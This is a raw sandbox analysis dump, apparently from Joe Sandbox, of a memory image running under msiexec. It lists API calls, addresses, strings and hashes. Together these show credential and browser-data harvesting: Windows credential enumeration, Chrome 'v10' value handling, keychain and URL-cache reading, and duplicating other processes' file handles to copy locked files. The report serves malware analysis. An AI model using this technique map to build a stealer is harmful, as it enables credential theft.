                                                                                        • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                        • Opcode Fuzzy Hash: 0a5514244f8da3553e93fddd8650c41e468bd34edf4168a604947191dfb6c3d8
                                                                                        • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                        APIs
                                                                                        • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                        • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                        • String ID:
                                                                                        • API String ID: 3473537107-0
                                                                                        • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                        • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                        • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                        • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                        APIs
                                                                                          • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                          • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                          • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                        • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                        • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                        • free.MSVCRT ref: 00418803
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 1355100292-0
                                                                                        • Opcode ID: d2c930e6252e89cba164dd291f6fd6a93c7c4142cb300574fab5a2c635c3ca3b
                                                                                        • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                        • Opcode Fuzzy Hash: d2c930e6252e89cba164dd291f6fd6a93c7c4142cb300574fab5a2c635c3ca3b
                                                                                        • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                        • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$FirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 1690352074-0
                                                                                        • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                        • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                        • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                        • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0041898C
                                                                                        • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoSystemmemset
                                                                                        • String ID:
                                                                                        • API String ID: 3558857096-0
                                                                                        • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                        • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                        • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                        • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004455C2
                                                                                        • wcsrchr.MSVCRT ref: 004455DA
                                                                                        • memset.MSVCRT ref: 0044570D
                                                                                        • memset.MSVCRT ref: 00445725
                                                                                          • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                          • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                          • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                          • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                          • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                          • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                          • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                          • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                        • memset.MSVCRT ref: 0044573D
                                                                                        • memset.MSVCRT ref: 00445755
                                                                                        • memset.MSVCRT ref: 004458CB
                                                                                        • memset.MSVCRT ref: 004458E3
                                                                                        • memset.MSVCRT ref: 0044596E
                                                                                        • memset.MSVCRT ref: 00445A10
                                                                                        • memset.MSVCRT ref: 00445A28
                                                                                        • memset.MSVCRT ref: 00445AC6
                                                                                          • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                          • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                          • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                          • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                          • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                        • memset.MSVCRT ref: 00445B52
                                                                                        • memset.MSVCRT ref: 00445B6A
                                                                                        • memset.MSVCRT ref: 00445C9B
                                                                                        • memset.MSVCRT ref: 00445CB3
                                                                                        • _wcsicmp.MSVCRT ref: 00445D56
                                                                                        • memset.MSVCRT ref: 00445B82
                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                          • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                        • memset.MSVCRT ref: 00445986
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                        • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                        • API String ID: 2263259095-3798722523
                                                                                        • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                        • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                        • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                        • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                          • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                          • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                          • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                        • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                        • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                        • String ID: $/deleteregkey$/savelangfile
                                                                                        • API String ID: 2744995895-28296030
                                                                                        • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                        • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                        • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                        • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040B71C
                                                                                          • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                          • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                        • wcsrchr.MSVCRT ref: 0040B738
                                                                                        • memset.MSVCRT ref: 0040B756
                                                                                        • memset.MSVCRT ref: 0040B7F5
                                                                                        • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                        • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                        • memset.MSVCRT ref: 0040B851
                                                                                        • memset.MSVCRT ref: 0040B8CA
                                                                                        • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                          • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                        • memset.MSVCRT ref: 0040BB53
                                                                                        • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                        • String ID: chp$v10
                                                                                        • API String ID: 4290143792-2783969131
                                                                                        • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                        • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                        • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                        • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                        • free.MSVCRT ref: 0040E49A
                                                                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                        • memset.MSVCRT ref: 0040E380
                                                                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                          • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                        • wcschr.MSVCRT ref: 0040E3B8
                                                                                        • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                        • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E407
                                                                                        • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E422
                                                                                        • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E43D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                        • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                        • API String ID: 3849927982-2252543386
                                                                                        • Opcode ID: 4fb386ce9209b8875289dcc542ef71d6c34f1816ca3767685257c05f3f5c3b96
                                                                                        • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                        • Opcode Fuzzy Hash: 4fb386ce9209b8875289dcc542ef71d6c34f1816ca3767685257c05f3f5c3b96
                                                                                        • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004091E2
                                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                        • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                        • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                        • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                        • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                        • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                        • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                        • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                        • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                        • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                        • String ID:
                                                                                        • API String ID: 3715365532-3916222277
                                                                                        • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                        • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                        • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                        • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                          • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                          • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                          • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                          • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                          • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                        • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                        • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                          • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                          • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                          • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                          • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                        • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                        • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                        • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                        • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                        • String ID: bhv
                                                                                        • API String ID: 4234240956-2689659898
                                                                                        • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                        • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                        • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                        • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                        • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                        • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                        • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                        • API String ID: 2941347001-70141382
                                                                                        • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                        • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                        • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                        • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                        • String ID:
                                                                                        • API String ID: 2827331108-0

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040C298
                                                                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                        • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                        • wcschr.MSVCRT ref: 0040C324
                                                                                        • wcschr.MSVCRT ref: 0040C344
                                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                        • GetLastError.KERNEL32 ref: 0040C373
                                                                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                        • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                        • String ID: visited:
                                                                                        • API String ID: 1157525455-1702587658

                                                                                        APIs
                                                                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                        • memset.MSVCRT ref: 0040E1BD
                                                                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                        • free.MSVCRT ref: 0040E28B
                                                                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                          • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                          • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                        • _snwprintf.MSVCRT ref: 0040E257
                                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                        • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                        • API String ID: 2804212203-2982631422

                                                                                        APIs
                                                                                          • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                          • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                          • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                        • memset.MSVCRT ref: 0040BC75
                                                                                        • memset.MSVCRT ref: 0040BC8C
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                        • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                        • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                        • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
